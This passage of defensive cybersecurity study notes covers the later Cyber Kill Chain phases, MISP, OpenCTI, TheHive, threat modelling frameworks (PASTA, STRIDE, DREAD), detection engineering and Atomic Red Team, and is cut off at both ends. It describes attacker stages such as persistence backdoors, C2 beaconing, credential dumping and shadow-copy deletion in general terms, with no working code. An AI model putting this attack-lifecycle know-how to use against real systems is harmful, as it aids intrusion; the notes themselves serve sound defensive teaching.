 - Creating backdoors.
Delivery
It's the phase where the attacker chooses the
method for transmitting the payload or the malware.
Examples of delivery can be:
 - Phishing email
 - USB Drop Attack: Distributing infected USB
 drives in public places like coffee shops,
 parking lots, or on the street.
 - Watering hole attack. A watering hole attack
 is a targeted attack designed to aim at a
 specific group of people by compromising the
 website they are usually visiting and then
 redirecting them to the malicious website of
 an attacker's choice.
Exploitation
It's the phase where the attacker could exploit software,
system, or server-based vulnerabilities to escalate the
privileges or move laterally through the network.
The attacker could exploit vulnerabilities by incorporating
the exploit with the payload in the weaponization phase or
simply after gaining access to the target system.
Installation
It's the phase where the attacker's aim is to re-access
the system at a later time: the attacker may lose the
connection, get detected and have the initial access
removed, or the system may later be patched, in which
case access would be lost. That is when the attacker
needs to install a persistent backdoor, which lets the
attacker access the system compromised in the past.
Command and Control
The stage where the compromised endpoint would
communicate with an external server set up by an
attacker to establish a command & control channel. After
establishing the connection, the attacker has full control
of the victim's machine.
The objective here is to control the victim machine by
sending commands and instructions to the victim
machine, which in turn executes them and sends the
output back to the attacker's C2 server.
Actions on objectives
In this stage, the attacker executes the strategic goal of
his entire plan. The actions can be:
 - Harvesting and dumping credentials from
 users.
 - Performing privilege escalation.
 - Lateral movement through the company's
 environment.
 - Collecting and exfiltrating sensitive data.
 - Deleting backups and shadow copies.
 - Overwriting or corrupting data.
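Tying the phases together, an analyst's reconstruction of a hypothetical intrusion might map observed artefacts to the seven phases like this; every evidence string below is made up for illustration.

```python
# Hypothetical incident artefacts mapped to Cyber Kill Chain phases,
# the kind of timeline an analyst might reconstruct after an intrusion.
kill_chain = [
    ("Reconnaissance",        "LinkedIn scraping of employee names"),
    ("Weaponization",         "Macro-enabled invoice.doc built"),
    ("Delivery",              "Phishing email to accounting staff"),
    ("Exploitation",          "Macro executes when the user opens the file"),
    ("Installation",          "Backdoor dropped to %APPDATA%"),
    ("Command and Control",   "Beacon to c2.example over HTTPS"),
    ("Actions on Objectives", "Credential dumping and data exfiltration"),
]

for phase, evidence in kill_chain:
    print(f"{phase:<22} {evidence}")

assert len(kill_chain) == 7  # the Lockheed Martin model has seven phases
```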
Threat Intelligence Platforms
Malware Information Sharing Platform
Definition
MISP is an open-source threat information platform that
facilitates the collection, storage and distribution of
threat intelligence and Indicators of Compromise (IOCs)
related to malware, cyber attacks, financial fraud or any
intelligence within a community of trusted members.
The threat information can be distributed and consumed by
Network Intrusion Detection Systems (NIDS), log analysis
tools and Security Information and Event Management
Systems (SIEM).
MISP Use Cases
 Malware Reverse Engineering: Sharing of
 malware indicators to understand how different
 malware families function.
 Security Investigations: Searching, validating
 and using indicators in investigating security
 breaches.
 Intelligence Analysis: Gathering information
 about adversary groups and their capabilities.
 Law Enforcement: Using indicators to support
 forensic investigations.
 Risk Analysis: Researching new threats, their
 likelihood and occurrences.
 Fraud Analysis: Sharing of financial indicators
 to detect financial fraud.
Installation and Setting Up
Installing on Ubuntu
 sudo apt-get update -y && sudo apt-get upgrade
 -y
 sudo apt-get install mysql-client -y
 wget
 https://raw.githubusercontent.com/MISP/MISP/2.
 4/INSTALL/INSTALL.sh
 chmod +x INSTALL.sh
 ./INSTALL.sh -A
 sudo ufw allow 80/tcp
 sudo ufw allow 443/tcp
Creating an organization and setting up users
We can create an organization by navigating to
Administration > Add Organisations
Next, we enable the threat intel feeds.
To load the default feeds that come with MISP, click    Load
default feeds    in the feeds page
To use a specific feed, we will need to enable it and
cache it so that the information related to the IOCs is
stored locally
The Instance Dashboard Breakdown
When first logging in to the platform, you will see the
below dashboard
The most important tabs are highlighted in yellow.
Event Actions
It's where you, as an analyst, will create all malware
investigation correlations by providing descriptions and
attributes associated with the investigation. You will
create an event that describes an ongoing malware
investigation and begin adding attributes and
attachments that capture your intel on the malware.
Lastly, you will publish this information so that others
can see it and perhaps import it into their IDS/SIEM.
Input filters
Allows the administrator to control how data is input into
the instance and how the data is exported as well by
creating different validation rules.
Global actions
It's the tab where you can see your profile, read the
news and see a list of the active organisations on this
instance.
Creating an event
The below screenshot shows how to add an event.
The distribution level controls how the event information is
shared among communities and has the below levels
 Your organisation only: This only allows
 members of your organisation to see the event.
 This community only: Users that are part of
 your MISP community will be able to see the
 event. This includes your organisation,
 organisations on this MISP server and
 organisations running MISP servers that
 synchronise with this server.
 Connected communities: Users who are part of
 your MISP community will see the event,
 including all organisations on this MISP
 server, all organisations on MISP servers
 synchronising with this server, and the
 hosting organisations of servers that are two
 hops away from this one.
 All communities: This will share the event with
 all MISP communities, allowing the event to be
 freely propagated from one server to the next.
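For reference, MISP encodes these four sharing levels as numeric distribution codes (0-3, in the same order as the list above) in its event JSON. Below is a rough sketch of what an event payload could look like; the field values are illustrative, not taken from a real instance.

```python
import json

# MISP's numeric distribution codes for the four sharing levels.
DISTRIBUTION = {
    "your_organisation_only": 0,
    "this_community_only": 1,
    "connected_communities": 2,
    "all_communities": 3,
}

# Illustrative shape of an event payload as it could be sent to the
# MISP REST API (all values here are made up).
event = {
    "info": "Suspected phishing campaign - March",
    "distribution": DISTRIBUTION["this_community_only"],
    "threat_level_id": 2,
    "analysis": 0,
}
print(json.dumps(event))
```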
This is how the event looks after creation
Adding attributes to the event
The below screenshot shows how to add an attribute
In the type field, we select the type of attribute. The list
contains several options such as md5, sha1, ip, etc.
Check the below screenshot to see an example entry
The option for intrusion detection makes the attribute
exportable to be used as an IDS signature.
The option Batch import allows joining multiple
attributes of the same type in one field, such as adding
multiple attributes of type IP address; you can join
them all with this option and enter them separated by
line breaks.
Adding attachments to the event
You can add attachments that can be malware samples or
malware reports using the below button
Tags
You can add tags to the event and its attributes to
identify them based on IOCs and threat information,
which makes sharing effective between users,
organizations and
communities. See an example below
Publishing the event
Once the event is published, it can be seen by the
channels selected when the event was first created.
OpenCTI
Definition
OpenCTI is an open-source platform designed to provide
organizations with the means to manage CTI through the
storage, analysis, visualisation and presentation of threat
campaigns, malware and IOCs.
The dashboard below showcases various visual widgets
summarizing the threat data ingested into OpenCTI.
Widgets on the dashboard showcase the current state of
entities ingested on the platform via the total number of
entities, relationships, reports and observables ingested,
and changes to these properties noted within 24 hours.
OpenCTI uses the Structured Threat Information
Expression (STIX2) standard, which is a serialized and
standardized language format used in threat
intelligence exchange. It
allows for the data to be implemented as entities and
relationships, effectively tracing the origin of the provided
information.
Connectors
     External Input Connector: Ingests information from
     external sources such as MISP and other threat intel
     platforms.
     Stream Connector: Consumes platform data stream
     Internal Enrichment Connector: Takes in new OpenCTI
     entities from user requests
     Internal Import File Connector: Extracts information
     from uploaded reports
     Internal Export File Connector: Exports information
     from OpenCTI into different file formats
Activities Section
The activities section covers security incidents ingested
onto the platform in the form of reports.
Analysis Tab
The Analysis tab contains the input entities in the form of
reports. Reports are central to OpenCTI as knowledge on
threats and events are extracted and processed.
Additionally, analysts can add their investigation notes and
other external resources for knowledge enrichment.
Events
Within the Events tab, security analysts can record their
findings about new security incidents, malware and
suspicious activities to enrich their threat intel.
Observations
Technical elements, detection rules and artefacts
identified during a cyber attack are listed under this
tab; one or several of these identifiable elements make
up an indicator. These elements assist analysts in
mapping out threat events during a hunt and in
performing correlations between what they observe in
their environments and the intel feeds.
Knowledge Section
The Knowledge section provides linked data related to the
tools adversaries use, targeted victims and the type of
threat actors and campaigns used.
Threats
Under the Threats tab, information such as the below can be found:
     Threat Actors: An individual or group of attackers
     seeking to propagate malicious actions against a
     target.
     Intrusion Sets: An array of TTPs, tools, malware and
     infrastructure used by a threat actor against targets
     who share some attributes. APTs and threat groups
     are listed under this category on the platform due to
     their known pattern of actions.
     Campaigns: Series of attacks taking place within a
     given period and against specific victims initiated by
     advanced persistent threat actors who employ
     various TTPs. Campaigns usually have specified
     objectives and are orchestrated by threat actors
     from a nation-state, crime syndicate or other
     disreputable organization.
Arsenal
This tab lists all items related to an attack and any
legitimate tools identified from the entities.
     Malware: Known and active malware and trojan are
     listed with details of their identification and mapping
     based on the knowledge ingested into the platform.
     In our example, we analyse the 4H RAT malware and
     we can extract information and associations made
     about the malware.
     Attack Patterns: Adversaries implement and use
     different TTPs to target, compromise, and achieve
     their objectives. Here, we can look at the details of
     the Command-Line Interface and make decisions
     based on the relationships established on the
     platform and navigate through an investigation
     associated with the technique.
     Courses of Action: MITRE maps out concepts and
     technologies that can be used to prevent an attack
     technique from being employed successfully. These
     are represented as Courses of Action (CoA) against
     the TTPs.
     Tools: Lists all legitimate tools and services
     developed for network maintenance, monitoring and
     management. Adversaries may also use these tools
     to achieve their objectives. For example, for the
     Command-Line Interface attack pattern, it is possible
     to narrow down that CMD would be used as an
     execution tool. As an analyst, one can investigate
     reports and instances associated with the use of the
     tool.
     Vulnerabilities: Known software bugs, system
     weaknesses and exposures are listed to provide
     enrichment for what attackers may use to exploit
     and gain access to systems. The Common
     Vulnerabilities and Exposures (CVE) list maintained by
     MITRE is used and imported via a connector.
The Hive
TheHive Project is an open-source Security Incident
Response Platform, designed to assist security
analysts and practitioners in tracking, investigating
and acting upon identified security incidents in a
swift and collaborative manner.
Key terms
Cases and Tasks
Investigations correspond to cases. The details of each
case can be broken down into associated tasks, which
can be created from scratch or through a template engine.
Analysts can record their progress, attach pieces of
evidence or noteworthy files, add tags and other archives
to cases.
Cases can be imported from SIEM alerts, email reports and
other security event sources. This feature allows an
analyst to go through the imported alerts and decide
whether or not they are to be escalated into investigations
or incident response.
Creating cases and tasks
Whenever there is an incident that warrants an
investigation, analysts can open and create cases to
facilitate the collaboration and exchange of incident
details.
The below figure shows how to create a case
A couple of things to note while creating the case:
 [Severity] This showcases the level of impact
 the incident being investigated has on the
 environment from low to critical levels.
 [TLP] The Traffic Light Protocol is a set of
 designations to ensure that sensitive
 information is shared with the appropriate
 audience. The range of colours represents a
 scale between full disclosure of information
 (White) and No disclosure/ Restricted (Red).
 You can find more information about the
 definitions on the CISA website.
 [PAP] The Permissible Actions Protocol is used
 to indicate what an analyst can do with the
 information, whether an attacker can detect
 the current analysis state or defensive
 actions in place. It uses a colour scheme
 similar to TLP and is part of the MISP
 taxonomies.
Also add tasks to the case to indicate what analysts
should do once they see it in their dashboard.
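Putting Severity, TLP and PAP together, a case record can be sketched with the numeric codes TheHive stores. This is an illustrative shape only: the values are made up, and the exact field set depends on your TheHive version, so check its API documentation before relying on it.

```python
import json

# Illustrative shape of a TheHive case, with Severity, TLP and PAP
# expressed as numeric codes (all values here are made up).
case = {
    "title": "Suspicious login activity on mail gateway",
    "description": "Multiple failed logins followed by a success",
    "severity": 2,   # 1=low .. 4=critical
    "tlp": 2,        # 0=WHITE .. 3=RED
    "pap": 2,        # 0=WHITE .. 3=RED
    "tasks": [
        {"title": "Collect authentication logs"},
        {"title": "Check source IP against threat intel"},
    ],
}
print(json.dumps(case, indent=2))
```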
TTPs
Once you create a case and assign tasks, you should
assign it the corresponding TTP as the below shows
Observables
A quick triaging process can be supported by allowing
analysts to add observables to their cases, leveraging
tags, flagging IOCs and identifying previously seen
observables to feed their threat intelligence. You can
create observables as the below screenshot shows
Cortex
Cortex is an observable analysis and active response
engine. Cortex allows analysts to collect more information
from threat indicators by performing correlation analysis
and developing patterns from the cases.
Dashboards
Statistics on cases, tasks, observables, metrics and
more can be compiled and distributed on dashboards that
can be used to generate useful KPIs within an
organisation.
MISP (Malware Information Sharing
Platform)
MISP is a threat intelligence platform for sharing, storing
and correlating Indicators of Compromise of targeted
attacks and other threats.
The integration with TheHive allows analysts to create
cases from MISP events, import IOCs or export their own
identified indicators to their MISP communities.
Live stream
Allows multiple analysts from one organisation to work
together on the same case simultaneously. Everyone can
keep an eye on the cases in real time.
User Profiles
To assign user profiles, first we create an organization
group as shown below
The pre-built user profiles are
 **admin:** full administrative permissions on
 the platform; can't manage any Cases or other
 data related to investigations;
 **org-admin:** manage users and all
 organisation-level configuration, can create
 and edit Cases, Tasks, Observables and run
 Analysers and Responders;
 **analyst:** can create and edit Cases, Tasks,
 Observables and run Analysers & Responders;
 **read-only:** Can only read, Cases, Tasks and
 Observables details;
For every user profile there is a list of associated
permissions that can be set once we add the user.
Below shows how we can add a user and assign a user-
profile.
Then we can select the permissions
Links
[1]
 https://thehive-project.org/
[2]
 https://github.com/TheHive-Project/TheHive
[3]
 https://github.com/TheHive-Project/Cortex/
Threat modelling
Definition of Threat Modeling
Threat modelling is a systematic approach to identifying,
prioritizing, and addressing potential security
threats across the organization. By simulating possible
attack scenarios and assessing the existing vulnerabilities
of the organization's interconnected systems and
applications, threat modelling enables organizations to
develop proactive security measures and make
informed decisions about resource allocation.
An example of threat modeling takes place during the early
stages of systems development, specifically during initial
design and specifications establishment. This method is
based on predicting threats and designing in specific
defenses during the coding and crafting process.
Part of threat modeling is creating a diagram that includes
the elements involved in a transaction along with every
possible threat/attack against these elements.
Another part of threat modeling is what is called
reduction analysis, also known as
decomposing the application,
system, or environment. The purpose of this task is to
gain a greater understanding of the logic of the product,
its internal components, as
well as its interactions with external elements. Whether
an application, a system, or an entire environment, it
needs to be divided into smaller containers or
compartments.
Those might be subroutines, modules, or objects if you're
focusing on software, computers, or operating systems;
they might be protocols if you're focusing on systems or
networks; or they might be departments, tasks, and
networks if you're focusing on an entire business
infrastructure.
Each identified element should be evaluated in order to
understand inputs, processing, security, data
management, storage, and outputs.
The final step is to rank or rate the threats. This
can be accomplished using a wide range of techniques,
such as Probability × Damage Potential ranking,
high/medium/low rating, or the DREAD system.
The Probability × Damage Potential technique produces
a risk severity number on a scale of 1 to 100, with
100 being the most severe risk possible. Each of the
two factors is assigned a number between 1 and 10,
with 1 being the lowest and 10 the highest.
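As an illustration, the ranking above comes down to a simple multiplication. The sketch below is only the arithmetic described in the text; the function name and example scores are our own.

```python
# Probability x Damage Potential ranking: each factor is scored 1-10,
# and their product yields a risk severity between 1 and 100.
def risk_severity(probability: int, damage_potential: int) -> int:
    """Return a risk severity score on a 1-100 scale."""
    for value in (probability, damage_potential):
        if not 1 <= value <= 10:
            raise ValueError("Each factor must be scored between 1 and 10")
    return probability * damage_potential

# Example: a fairly likely threat (7) with severe damage potential (9)
print(risk_severity(7, 9))  # 63
```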
Threat Modeling vs Threat Hunting
Threat hunting is the activity of looking
for existing evidence of a compromise once symptoms or
an IoC (indicator of compromise) of an exploit become
known.
Threat modeling looks for zero-day exploits before harm is
experienced, whereas threat hunting uses IoC information
to find harm that has already occurred.
Creating a Threat Modeling Plan
Defining the scope
Identify the specific systems, applications, and networks
to include in the threat modelling exercise.
Asset Identification
Develop diagrams of the organization's architecture and
its dependencies. It is also essential to identify the
importance of each asset based on the information it
handles, such as customer data, intellectual property,
and financial information.
Identify Threats
Identify potential threats that may impact the identified
assets, such as cyber attacks, physical attacks, social
engineering, and insider threats.
Map to MITRE ATT&CK or any threat modeling/intelligence
framework
Map the identified threats to the corresponding tactics and
techniques in the MITRE ATT&CK Framework. For each
mapped technique, utilise the information found on the
corresponding ATT&CK technique page, such as the
description, procedure examples, mitigations, and
detection strategies, to gain a deeper understanding of
the threats and vulnerabilities in your system.
Analyze Vulnerabilities and Prioritize Risks
Analyze the vulnerabilities based on the potential impact of
identified threats in conjunction with assessing the
existing security controls. Given the list of vulnerabilities,
risks should be prioritized based on their likelihood and
impact.
Develop and Implement Countermeasures
Design and implement security controls to address the
identified risks, such as implementing access controls,
applying system updates, and performing regular
vulnerability assessments.
Monitor and Evaluate
Continuously test and monitor the effectiveness of the
implemented countermeasures and evaluate the success of
the threat modelling exercise. An example of a simple
measurement of success is tracking the identified risks
that have been effectively mitigated or eliminated.
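As a minimal sketch of such a success metric (the function name and figures below are illustrative, not part of any standard):

```python
def mitigation_rate(identified: int, mitigated: int) -> float:
    """Percentage of identified risks that were mitigated or eliminated."""
    if identified == 0:
        return 0.0
    return round(100 * mitigated / identified, 1)

# Example: 34 of 40 identified risks were effectively mitigated
print(mitigation_rate(40, 34))  # 85.0
```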
Threat Modeling Team
Security Team
The overarching team comprising the red and blue teams.
This team typically leads the threat modelling process,
providing expertise on threats, vulnerabilities, and risk
mitigation strategies. They also ensure security measures
are implemented, validated, and continuously monitored.
Development Team
The development team is responsible for building secure
systems and applications. Their involvement ensures that
security is always incorporated throughout the
development lifecycle.
IT and Operations Team
IT and Operations teams manage the organization's
infrastructure, including networks, servers, and other
critical systems. Their knowledge of network
infrastructure, system configurations and application
integrations is essential for effective threat modelling.
Governance, Risk and Compliance Team
The GRC team is responsible for organization-wide
compliance assessments based on industry regulations and
internal policies. They collaborate with the security team
to align threat modelling with the organisation's risk
management objectives.
Business Stakeholders
The business stakeholders provide valuable input on the
organisation's critical assets, business processes, and
risk tolerance. Their involvement ensures that the efforts
align with the organization's strategic goals.
End Users
As direct users of a system or application, end users can
provide unique insights and perspectives that other teams
may not have, enabling the identification of vulnerabilities
and risks specific to user interactions and behaviours.
Microsoft Threat Modeling Tool
To download the Microsoft Threat Modeling Tool, visit
Threat Modeling Tool.
You can also download a sample model from the link
below:
 https://d3c33hcgiwev3.cloudfront.net/8GlSo7jMR
 ka5DlQGamTdog_b69ce013413949f9b6516549cd90f5e1
 _Sample_Threat-Model_https.tm7?
 Expires=1718150400&Signature=VS-
 9wxdP1jHJI4X9ECkWnClZ4Wmo0ywoZWMSxMaq0tvrF8NMq
 -
 wCqso8SSaW4IVES086hbnEfamn8k90IAczFQh69xy8~mzE
 e9vQ-
 IC7KpeO8RnKItU0Q~4PTy0uDnAjheRFNGzoERRHud-
 nrO04Rn9cV3YPFOEh2lG0xRjWnUA_&Key-Pair-
 Id=APKAJLTNE6QMUY6HBC5A
Usage
   1. Open the Microsoft Threat Modeling Tool.
   2. Select Open a Model and navigate to the
      Sample_Threat Model_https.tm7 file you
        downloaded earlier.
   3. Notice that there is a Stencils panel on the right of
      the screen. Stencils are used to add components to
        a diagram. Explore the components used in the
        model to make sure you understand the diagram.
   4. Switch to Analysis View by selecting the Switch to
      Analysis View button in the toolbar in the top left
        corner of the screen (page with magnifying glass
   icon)
5. Notice that the Threat List panel now shows the
   possible threats in a list below the diagram. Select
   one of the threats in the list to view the Threat
   Properties panel that contains additional information
   about the specific threat.
Title, Category, and Description fields: You can enter
essential information about the threat in these
fields.
Justification field: In this field, you can enter
information about why you choose to accept or reject
a particular threat. This information can be helpful
for other team members who are reviewing the
threat model, as well as for future reference.
Priority box: Here, you can set the priority of the
threat to High, Medium, or Low.
 Team box: You can assign a threat to a specific
 team here.
 Status box: Here, you can set the threat status to
 Not Started, Needs Investigation, Not Applicable, or
 Mitigated.
6. You can download the threat list as a CSV file by
   selecting Export CSV. This gives you a structured
   and easily accessible record of identified threats
   that you can share with stakeholders who do not
   have the Microsoft Threat Modeling tool installed. A
   popup window will appear. Select the
   Countermeasure, Risk, and Team options and then
   Generate Report.
Threat Modeling Frameworks
PASTA
Definition
PASTA, or Process for Attack Simulation and Threat
Analysis, is a structured, risk-centric threat modelling
framework designed to help organizations identify and
evaluate security threats and vulnerabilities within their
systems, applications, or infrastructure. PASTA provides a
systematic, seven-step process that enables security
teams to understand potential attack scenarios better,
assess the likelihood and impact of threats, and prioritise
remediation efforts accordingly.
PASTA is an excellent framework for aligning threat
modelling with business objectives. Unlike other
frameworks, PASTA integrates business context, making it
a more holistic and adaptable choice for organisations.
Components
    1.   Define the Objectives
         Establish the scope of the threat modelling exercise
         by identifying the systems, applications, or
         networks being analysed and the specific security
         objectives and compliance requirements to be met.
    2.   Define the Technical Scope
         Create an inventory of assets, such as hardware,
         software, and data, and develop a clear
         understanding of the system's architecture,
         dependencies, and data flows.
    3.   Decompose the Application
         Break down the system into its components,
         identifying entry points, trust boundaries, and
         potential attack surfaces. This step also includes
         mapping out data flows and understanding user
         roles and privileges within the system.
    4.   Analyze the Threats
         Identify potential threats to the system by
         considering various threat sources, such as
         external attackers, insider threats, and accidental
        exposures. This step often involves leveraging
        industry-standard threat classification frameworks
        or attack libraries.
   5.   Vulnerabilities and Weaknesses Analysis
        Analyze the system for existing vulnerabilities,
        such as misconfigurations, software bugs, or
        unpatched systems, that an attacker could exploit
        to achieve their objectives. Vulnerability
        assessment tools and techniques, such as static
        and dynamic code analysis or penetration testing,
        can be employed during this step.
   6.   Analyze the Attacks
        Simulate potential attack scenarios and evaluate
        the likelihood and impact of each threat. This step
        helps determine the risk level associated with each
        identified threat, allowing security teams to
        prioritize the most significant risks.
   7.   Risk and Impact Analysis
        Develop and implement appropriate security controls
        and countermeasures to address the identified
        risks, such as updating software, applying
        patches, or implementing access controls. The
        chosen countermeasures should be aligned with the
        organisation's risk tolerance and security
        objectives.
STRIDE
Definition and Components
The STRIDE framework is a threat modelling methodology
also developed by Microsoft, which helps identify and
categorize potential security threats in software
development and system design.
STRIDE shines in its structure and methodology, allowing
for a systematic review of threats specific to software
systems.
Components
Spoofing
Unauthorized access or impersonation of a user or
system.
Examples:
     Sending an email as another user.
     Creating a phishing website mimicking a legitimate
     one to harvest user credentials.
Tampering
Unauthorized modification or manipulation of data or
code.
Examples:
     Updating the password of another user.
     Installing system-wide backdoors using elevated
     access.
Repudiation
Ability to deny having performed an action, typically
due to insufficient auditing or logging.
Examples:
     Denying unauthorised money-transfer transactions
     when the system lacks auditing.
     Denying sending an offensive message to another
     person when the recipient lacks proof of receiving
     one.
Information Disclosure
Unauthorized access to sensitive information, such as
personal or financial data.
Examples:
     Unauthenticated access to a misconfigured database
     that contains sensitive customer information.
     Accessing public cloud storage that holds sensitive
     documents.
Denial of Service
Disruption of the system's availability, preventing
legitimate users from accessing it.
Examples:
     Flooding a web server with requests, overwhelming
     its resources and making it unavailable to
     legitimate users.
     Deploying ransomware that encrypts all system data,
     preventing other systems from accessing the
     resources hosted on the compromised server.
Elevation of Privilege
Unauthorized elevation of access privileges, allowing
threat actors to perform unintended actions.
Examples:
     Creating a regular user account but being able to
     access the administrator console.
     Gaining local administrator privileges on a machine
     by abusing unpatched systems.
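A common way to remember STRIDE is that each category violates one security property: Spoofing violates authentication, Tampering integrity, and so on. The lookup below sketches that well-known mapping; the helper function is our own, not part of any Microsoft tooling.

```python
# STRIDE category -> security property it violates (standard mapping)
STRIDE = {
    "Spoofing": "Authentication",
    "Tampering": "Integrity",
    "Repudiation": "Non-repudiation",
    "Information Disclosure": "Confidentiality",
    "Denial of Service": "Availability",
    "Elevation of Privilege": "Authorization",
}

def violated_property(threat_category: str) -> str:
    """Return the security property violated by a STRIDE category."""
    return STRIDE[threat_category]

print(violated_property("Tampering"))  # Integrity
```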
DREAD Framework
Definition
The DREAD framework is a risk assessment model
developed by Microsoft to evaluate and prioritize security
threats and vulnerabilities.
DREAD offers a more numerical and calculated approach to
threat analysis than STRIDE or MITRE ATT&CK, making it
excellent for clearly prioritizing threats.
How it works
Each letter of the DREAD acronym corresponds to one
assessment criterion:
Damage
How bad would an attack be?
The potential harm that could result from the successful
exploitation of a vulnerability. This includes data loss,
system downtime, or reputational damage.
Reproducibility
How easy is it to reproduce the attack?
The ease with which an attacker can successfully recreate
the exploitation of a vulnerability. A higher reproducibility
score suggests that the vulnerability is straightforward to
abuse, posing a greater risk.
Exploitability
How much work is it to launch the attack?
The difficulty level involved in exploiting the vulnerability
considering factors such as technical skills required,
availability of tools or exploits, and the amount of time it
would take to exploit the vulnerability successfully.
Affected Users
How many people will be impacted?
The number or portion of users impacted once the
vulnerability has been exploited.
Discoverability
How easy is it to discover the vulnerability?
The ease with which an attacker can find and identify the
vulnerability considering whether it is publicly known or
how difficult it is to discover based on the exposure of
the assets (publicly reachable or in a regulated
environment).
Putting it into practice
The DREAD Framework is typically used for
qualitative risk analysis, rating each category from
one to ten based on a subjective assessment and
interpretation of the questions above. The average
score across all criteria gives the overall DREAD
risk rating.
Damage
     0 – No damage caused to the organization
     5 – Information disclosure has occurred
     8 – Non-sensitive user data has been compromised
     9 – Non-sensitive administrative data has been
     compromised
     10 – The entire information system has been
     destroyed; all data and applications are
     inaccessible
Reproducibility
     0 – Difficult to replicate the attack
     5 – Complex to replicate the attack
     7.5 – Easy to replicate the attack
     10 – Very easy to replicate the attack
Exploitability
     2.5 – Advanced programming and networking skills
     are needed to exploit the vulnerability
     5 – Available attack tools are needed to exploit
     the vulnerability
     9 – A web application proxy is enough to exploit
     the vulnerability
     10 – Only a web browser is needed to exploit the
     vulnerability
Affected Users
     0 – No users affected
     2.5 – Individual users affected
     6 – Few users affected
     8 – Administrative users affected
     10 – All users affected
Discoverability
     2.5 – Hard to discover the vulnerability
     5 – HTTP requests can uncover the vulnerability
     8 – Vulnerability found in the public domain
     10 – Vulnerability visible in the web address bar
     or a form
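Putting the arithmetic together, the overall DREAD rating is simply the average of the five criterion scores. A minimal sketch (the function name and sample scores are illustrative):

```python
def dread_rating(damage, reproducibility, exploitability,
                 affected_users, discoverability):
    """Average of the five DREAD criteria (each scored 0-10)."""
    scores = [damage, reproducibility, exploitability,
              affected_users, discoverability]
    return round(sum(scores) / len(scores), 1)

# Example: sensitive data compromised (8), easy to replicate (7.5),
# attack tools available (5), few users affected (6), publicly known (8)
print(dread_rating(8, 7.5, 5, 6, 8))  # 6.9
```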
Detection Engineering
Definition
Detection engineering is the continuous process of building
and operating threat intelligence analytics to identify
potentially malicious activity or misconfigurations that may
affect your environment. It requires a cultural shift with
the alignment of all security teams and management to
build effective threat-rich defense systems.
Threat detection can be environment-based, which focuses
on changes in an environment measured against defined
configurations and baseline activities, or threat-based,
which focuses on elements associated with an adversary's
activity, such as the tactics, tools and artefacts that
would identify their actions.
Creating Detection Rules
Based on the infrastructure setup and SIEM services,
detection rules will need to be written and tested against
the data sources. Detection rules test for abnormal
patterns against logged events. Network traffic would be
assessed via Snort rules, while Yara rules would evaluate
file data.
Tested detection rules must be put into production to be
assessed in a live environment. Over time, the detections
would need to be modified and updated to account for
changes in attack vectors, patterns or environment. This
improves the quality of detections and encourages viewing
detection as an ongoing process.
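To make the idea concrete, a detection rule is ultimately logic that tests logged events against a pattern or threshold. The sketch below is not Snort or Yara syntax, just a hypothetical threshold rule over made-up log lines, to show the shape of such logic:

```python
from collections import Counter

# Hypothetical log lines in the form "timestamp user event"
LOGS = [
    "09:00:01 alice LOGIN_FAILED",
    "09:00:02 alice LOGIN_FAILED",
    "09:00:03 alice LOGIN_FAILED",
    "09:00:04 alice LOGIN_FAILED",
    "09:00:05 alice LOGIN_FAILED",
    "09:01:10 bob LOGIN_OK",
]

def detect_bruteforce(logs, threshold=5):
    """Flag users whose failed-login count meets the threshold."""
    failures = Counter(
        line.split()[1] for line in logs if line.endswith("LOGIN_FAILED")
    )
    return [user for user, count in failures.items() if count >= threshold]

print(detect_bruteforce(LOGS))  # ['alice']
```

In production the same logic would live in a SIEM query or correlation rule, and the threshold would be tuned over time as the environment changes.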
Threat Emulation
Definition
Threat emulation is an intelligence-driven imitation of
real-world attack scenarios and TTPs in a controlled
environment to test, assess and improve an
organization's security defences and response
capabilities. Threat emulation usually relies on intelligence
data retrieved from threat intelligence, incident response
and above all MITRE ATT&CK TTPs to imitate attackers'
behaviors and profiles.
Threat Emulation vs Threat Simulation
Threat emulation, as defined above, imitates real-world
attack scenarios and TTPs in a controlled environment to
test, assess and improve an organization's security
defences and response capabilities. This means that you
seek to behave exactly as the adversary would. Threat
emulation aims to identify and mitigate security gaps
before attackers exploit them.
Emulation can be conducted as a blind operation – mainly
as a Red Team engagement and unannounced to the rest of
the defensive security team – or as a non-blind operation
involving all security teams and ensuring knowledge
sharing.
In contrast, threat simulation commonly represents
adversary functions or behaviour through predefined and
automated attack patterns that pretend to represent an
adversary. This implies that the actions taken during the
exercise will combine TTPs from one or more groups but
not an exact imitation of a particular adversary.
Threat Emulation Methodologies
MITRE ATT&CK
The MITRE ATT&CK Framework is an industry-known
knowledge base that provides information about known
adversarial TTPs observed in actual attacks and breaches.
Threat emulation teams can extract many benefits from
integrating ATT&CK into their engagements, as it makes
writing reports and mitigations related to the emulated
behaviors more efficient.
Atomic Testing
Definition
Atomic Red Team is an open-source project that provides
a framework for performing security testing and threat
emulation. It consists of tools and techniques that can be
used to simulate various types of attacks and security
threats, such as malware, phishing attacks, and network
compromise. The Atomic Red Team aims to help security
professionals assess the effectiveness of their
organization's security controls and incident response
processes and identify areas for improvement.
The Atomic Red Team framework is designed to be modular
and flexible, allowing security professionals to select the
tactics and techniques most relevant to their testing
needs. It is intended to be used with other tools and
frameworks, such as the MITRE ATT&CK framework, which
provides a comprehensive overview of common tactics and
techniques threat actors use.
Components of Atomic Red Team
Atomics refers to different testing techniques based on
the MITRE ATT&CK Framework. Each works as a standalone
testing mock-up that Security Analysts can use to emulate
a specific Technique, such as OS Credential Dumping:
LSASS Memory, for a quick example.
Each Atomic typically contains two files, both of which
are named after their MITRE ATT&CK Technique ID:
     Markdown File (.md) – Contains all the
     information about the technique, the supported
     platform, Executor, GUID, and commands to be
     executed.
     YAML File (.yaml) – Configuration used by
     frameworks, such as Invoke-Atomic and
     Atomic-Operator, to perform the exact emulation
     of the technique.
     Breakdown of the YAML Config file
     The first few fields are already given based on their
     field names:
     attack_technique - MITRE ATT&CK Technique ID,
     which also signifies the file's name.
     display_name - The technique name, similar to how
     it is presented as a MITRE Technique.
     atomic_tests - List of atomic tests, which details
     how every test is executed.
     The following section details the contents of a single
     Atomic Test under the list of atomic_tests field:
     name - Short snippet that describes how it tests the
     technique.
     auto_generated_guid - Unique identifier of the
     specific test.
     description - A longer form of the test details and
     can be written in a multi-line format.
     supported_platforms - The platform(s) on which
     the technique will be executed (e.g., Windows).
input_arguments - Required values during the
execution, resorts to the default value if nothing is
supplied.
To conclude with the contents of an Atomic test,
details about dependencies and executors are as
follows:
dependency_executor_name - Option for how the
prerequisites will be validated. The possible values
for this field are similar to those of the Executor
field.
dependencies
prereq_command: - Commands to check whether the
requirements for running this test are met. For the
command_prompt executor, the prerequisites are not
satisfied if any command returns a non-zero exit
code. For the powershell executor, all commands are
run as a script block, and the script block must
